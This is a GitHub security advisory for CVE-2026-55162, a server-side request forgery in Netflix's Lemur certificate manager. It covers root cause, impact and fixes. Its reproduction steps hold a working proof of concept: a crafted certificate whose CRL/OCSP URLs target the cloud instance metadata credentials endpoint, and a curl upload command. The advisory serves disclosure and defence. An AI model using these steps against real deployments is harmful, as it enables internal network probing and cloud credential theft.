Skip to content

Lemur: Crafted CRL/OCSP URLs in uploaded certificates lead to post-authentication SSRF

Moderate severity GitHub Reviewed Published Jun 10, 2026 in Netflix/lemur

Package

lemur (pip)

Affected versions

<= 1.9.1

Patched versions

1.9.2

Description

Summary

When verifying an uploaded certificate, lemur/certificates/verify.py extracts the CRL Distribution Point URL and the OCSP responder URL directly from the certificate's extensions and issues outbound requests to those URLs without scheme restriction or destination allow-listing. An authenticated user holding the operator role (required by StrictRolePermission on POST /certificates/upload) can craft a certificate whose extensions point at internal services - instance metadata endpoints, internal Kubernetes API servers, RFC1918 hosts, link-local addresses - and cause the Lemur host to issue requests against those destinations during verification.

Root Cause

lemur/certificates/verify.py, crl_verify:

point = p.full_name[0].value                          # URL from CDP extension of uploaded cert
...
response = requests.get(point, timeout=(3.05, 6))     # no allow-list, no destination filter

lemur/certificates/verify.py, ocsp_verify:

command = ["openssl", "x509", "-noout", "-ocsp_uri", "-in", cert_path]
p1 = subprocess.Popen(command, stdout=subprocess.PIPE, ...)
url, _ = p1.communicate()
p2 = subprocess.Popen(
    ["openssl", "ocsp", "-issuer", issuer_chain_path, "-cert", cert_path,
     "-url", url.strip()],                            # attacker-controlled URL
    ...
)

In both code paths the URL flows from attacker-controlled certificate-extension content to a network sink with no validation against an allow-list of hostnames, no scheme restriction beyond rejecting LDAP via InvalidSchema, and no filtering of RFC1918 / link-local (169.254/16) / loopback / IPv6 ULA destinations.

Affected Endpoints

Method Path Source
POST /api/1/certificates/upload verify_stringcrl_verify / ocsp_verify

The bug additionally surfaces anywhere verify_string is invoked on attacker-influenced certificate content (sync paths, source plugin re-validation, etc.). The upload endpoint is the most direct trigger.

Impact

An operator-role attacker can:

  • Probe the Lemur host's internal network through outbound CRL/OCSP fetches and infer topology from response timings and error messages.
  • On EC2 instances without IMDSv2 enforcement, cause requests to http://169.254.169.254/ and influence downstream behavior of components that parse the response.
  • Pin attacker-controlled CRLs into the unbounded module-level crl_cache dict (see Advisory 4c) for permanent cache poisoning - once cached, a poisoned CRL is served to every subsequent verification for the same URL.
    The operator-role precondition reduces severity from what an unauthenticated SSRF would warrant, but operators are still meaningfully less trusted than the host's network position. PKI workflows also routinely process third-party certificates whose extensions are not directly controlled by the operator, broadening the trigger surface beyond purely-malicious operators.

Remediation

Filter the URL before it reaches the network sink. Either:

  1. Maintain an explicit allow-list of CRL/OCSP hostnames in configuration (e.g., LEMUR_TRUSTED_CRL_HOSTS and LEMUR_TRUSTED_OCSP_HOSTS) and reject anything outside the list, or
  2. Use an SSRF-safe HTTP client wrapper that resolves the destination, rejects RFC1918 / link-local / loopback / IPv6 ULA addresses before connecting, and pins the resolved IP to defeat DNS rebinding.
    For OCSP, route the parsed URL through the same wrapper before passing it as -url to openssl ocsp.

Additionally, bound crl_cache (see Advisory 4c) to prevent the SSRF vector from amplifying into a persistent cache-poisoning condition.

Steps to Reproduce

  1. Set up Lemur on an EC2 instance with IMDSv1 enabled (or any host with reachable RFC1918 services). Create an admin user and an operator-role user eve.

  2. Generate a self-signed certificate whose extensions point at internal services:

    cat > openssl.cnf <<EOF
    [req]
    distinguished_name = req_distinguished_name
    req_extensions = v3_ca
    prompt = no
    
    [req_distinguished_name]
    CN = ssrf-poc.example
    
    [v3_ca]
    crlDistributionPoints = URI:http://169.254.169.254/latest/meta-data/iam/security-credentials/
    authorityInfoAccess = OCSP;URI:http://169.254.169.254/latest/meta-data/
    EOF
    
    openssl req -x509 -newkey rsa:2048 -keyout ssrf.key -out ssrf.crt \
        -days 365 -nodes -config openssl.cnf -extensions v3_ca
    
  3. On the Lemur host, start a packet capture filter for the target address before submitting the cert:

    sudo tcpdump -nni any host 169.254.169.254
    
  4. As eve, upload the malicious certificate:

    BODY=$(cat ssrf.crt | sed ':a;N;$!ba;s/\n/\\n/g')
    curl -X POST https://lemur.local/api/1/certificates/upload \
         -H "Authorization: Bearer <eve_jwt>" \
         -H "Content-Type: application/json" \
         -d "{
               \"name\": \"ssrf-poc\",
               \"body\": \"$BODY\",
               \"chain\": \"\",
               \"private_key\": \"\",
               \"owner\": \"eve@example.com\"
             }"
    
  5. Observe the outbound request to 169.254.169.254 in the tcpdump output. The request originates from the Lemur process during verify_string processing of the uploaded cert. The attacker has successfully induced a server-side request to an internal address of their choosing.

References

@PJ1288 PJ1288 published to Netflix/lemur Jun 10, 2026
Published to the GitHub Advisory Database Jun 25, 2026
Reviewed Jun 25, 2026

Severity

Moderate

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
Low
User interaction
None
Scope
Unchanged
Confidentiality
Low
Integrity
Low
Availability
Low

CVSS v3 base metrics

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

EPSS score

Weaknesses

Server-Side Request Forgery (SSRF)

The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination. Learn more on MITRE.

CVE ID

CVE-2026-55162

GHSA ID

GHSA-54vg-pfh7-jq95

Source code

Credits

Loading Checking history
See something to contribute? Suggest improvements for this vulnerability.